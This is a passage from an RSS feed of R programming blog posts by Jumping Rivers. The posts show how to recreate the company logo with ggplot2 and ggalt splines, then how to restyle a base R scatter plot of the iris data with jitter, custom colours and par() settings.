&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ggalt&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-our-logo-in-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;We’re also going to need the data containing the points for the lines and which set of points belongs to which line. There is a Gist available to download via &lt;a href="https://gist.github.com/jumpingrivers/6e88357ef28697c612bb5553251a473d" rel="external"&gt;Jumping Rivers&lt;/a&gt;. To read in the CSV file we’re going to use the raw data link.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(dd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://goo.gl/HzNbAp&amp;#34;&lt;/span&gt;, col_types &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ddc&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 40 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## x y type&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 36.9 -311 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 67.9 -332 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 179 -156 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 254 -259 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 36 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The data set contains three columns, &lt;code&gt;x&lt;/code&gt;, &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;type&lt;/code&gt;, where &lt;code&gt;type&lt;/code&gt; indicates the line. Let’s start with a standard &lt;code&gt;geom_line()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(dd, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(group &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot1.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The graph shares similarities with our logo, but is too &lt;em&gt;discrete&lt;/em&gt;. To smooth the curve, we’ll use a function from the {ggalt} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggalt&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_xspline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(group &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type), spline_shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot2.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The function &lt;code&gt;geom_xspline()&lt;/code&gt; is the X-spline version of &lt;code&gt;geom_line()&lt;/code&gt;, drawing a curve relative to the observations. The parameter &lt;code&gt;spline_shape = -0.3&lt;/code&gt; controls the shape of the spline relative to the observations. This can be a number between &lt;code&gt;-1&lt;/code&gt; &amp;amp; &lt;code&gt;1&lt;/code&gt;. Basically, &lt;code&gt;-1&lt;/code&gt; = bumpy lines, &lt;code&gt;1&lt;/code&gt; = flat lines.&lt;/p&gt;
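&lt;p&gt;To see the effect of the shape parameter for yourself, a small sketch along the following lines may help. The data frame &lt;code&gt;toy&lt;/code&gt; is made up for illustration and is not the logo data. In the base R &lt;code&gt;xspline()&lt;/code&gt; documentation, negative shape values make the curve pass through the points, while positive values only approach them.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;ggplot2&amp;#34;)
library(&amp;#34;ggalt&amp;#34;)

# Hypothetical toy data: six points on a zig-zag
toy = data.frame(x = 1:6, y = c(0, 2, 1, 3, 1, 2))
p = ggplot(toy, aes(x, y)) + geom_point()

# Same points, two extremes of spline_shape
p_bumpy = p + geom_xspline(spline_shape = -1)
p_flat = p + geom_xspline(spline_shape = 1)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Printing &lt;code&gt;p_bumpy&lt;/code&gt; and &lt;code&gt;p_flat&lt;/code&gt; side by side makes it easier to pick a value in between, such as the &lt;code&gt;-0.3&lt;/code&gt; used here.&lt;/p&gt;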
&lt;p&gt;Next we’ll change the widths of the lines&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(g1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_xspline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type, group &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type), spline_shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_size_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, guide &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;none&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot3.svg" style="width:450px; class:image-center"&gt;
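&lt;p&gt;The widths passed to &lt;code&gt;values&lt;/code&gt; above come from a small piece of vector arithmetic. As a quick check, evaluating the expression on its own shows the four widths, from thickest to thinnest. This assumes, as the four values suggest, that &lt;code&gt;type&lt;/code&gt; takes four distinct values.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# 4:1 counts down from 4 to 1; dividing by 2 halves each value
widths = (4:1) / 2
widths
## [1] 2.0 1.5 1.0 0.5
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;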
&lt;p&gt;The &lt;code&gt;scale_size_manual()&lt;/code&gt; function enables us to control the line widths. Finally, we remove the background&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot4.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The function &lt;code&gt;theme_void()&lt;/code&gt; does what it says on the tin: it gives us a theme completely void of everything, bar the lines of course.&lt;/p&gt;
&lt;p&gt;That’s all for now. Thanks for reading! :)&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/our-logo-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Styling Base R Graphics</title><link>https://www.jumpingrivers.com/blog/styling-base-r-graphics/</link><pubDate>Thu, 25 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/styling-base-r-graphics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/styling-base-r-graphics/original.gif " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/#publication-quality-base-r-graphics"&gt;Publication quality base R graphics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/#fixing-the-problem"&gt;Fixing the problem&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/#why-not-use-ggplot2-or-something-else"&gt;Why not use {ggplot2} (or something else)?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="publication-quality-base-r-graphics"&gt;Publication quality base R graphics&lt;/h2&gt;
&lt;p&gt;Base R graphics get a bad press (although to be fair, they could have chosen their default values better). In general, they are viewed as a throwback to the dawn of the R era. I think that most people would agree that, in general, there are better graphics techniques in R (e.g. {ggplot2}). However, it is occasionally worthwhile making a plot using base R graphics, for example if you have a publication and you want to make sure the graphics are still reproducible in five years.&lt;/p&gt;
&lt;p&gt;In this post we’ll discuss methods for dramatically altering the look and feel of a base R plot. With a bit (ok, a lot) of effort, it is possible to change all aspects of the plot to your liking.&lt;/p&gt;
&lt;p&gt;Typically I detest the &lt;code&gt;iris&lt;/code&gt; data set. It’s perhaps the most overused dataset in the entire R world. For this &lt;strong&gt;very&lt;/strong&gt; reason, we’ll use it in this post to show what’s possible ;)&lt;/p&gt;
&lt;p&gt;The standard base R scatter plot is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length, iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;legend&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;topright&amp;#34;&lt;/span&gt;, legend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;levels&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species), col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, pch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;21&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot1-1.svg" style="width:500px; class:image-center"&gt;
&lt;p&gt;This gives a simple scatter plot with an associated legend using the default colour scheme. The list of things wrong with this plot is fairly lengthy, and includes (but is not limited to)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Colours&lt;/li&gt;
&lt;li&gt;Margins&lt;/li&gt;
&lt;li&gt;Axis labels&lt;/li&gt;
&lt;li&gt;Overlapping points&lt;/li&gt;
&lt;li&gt;Wasted space&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, with base R graphics we can fix all of these faults!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-styling-base-r-graphics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="fixing-the-problem"&gt;Fixing the problem&lt;/h2&gt;
&lt;p&gt;What’s not clear in the scatter plot above is that some points lie on top of each other. So the first step is to wiggle the points slightly using the &lt;code&gt;jitter()&lt;/code&gt; function, so that overlapping points become visible.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Same as geom_jitter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;jitter&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;jitter&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next we select nicer colours (I’ve taken this palette from the great &lt;a href="http://tools.medialab.sciences-po.fr/iwanthue/" rel="external"&gt;I want hue&lt;/a&gt; website). The &lt;code&gt;palette()&lt;/code&gt; function allows you to globally change the colour palette used by base R plots&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;150&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Transparent points&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;palette&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;79&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;178&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; alpha, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;105&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;147&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; alpha, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;85&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;130&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;169&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; alpha, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next we alter a few plot characteristics with the &lt;code&gt;par()&lt;/code&gt; function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;par&lt;/span&gt;(mar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Dist&amp;#39; from plot to side of page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mgp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Dist&amp;#39; plot to label&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; las &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Rotate y-axis text&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tck &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-.01&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Reduce tick length&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;i&amp;#34;&lt;/span&gt;, yaxs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;i&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Remove plot padding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then it comes to the &lt;code&gt;plot()&lt;/code&gt; function itself. This has now become a &lt;strong&gt;lot&lt;/strong&gt; more complicated. We create the plot using the &lt;code&gt;plot()&lt;/code&gt; function, with a number of arguments&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length, iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species, &lt;span style="color:#8b949e;font-style:italic"&gt;# Fill colour&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;21&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Shape: circles that can be filled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xlab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal Length&amp;#34;&lt;/span&gt;, ylab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal Width&amp;#34;&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Labels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Don&amp;#39;t plot the axes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; frame.plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Remove the frame&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xlim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;), ylim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4.5&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Limits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.first &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;abline&lt;/span&gt;(h &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;), col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey80&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;then add in the x-axis tick labels&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pretty&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)
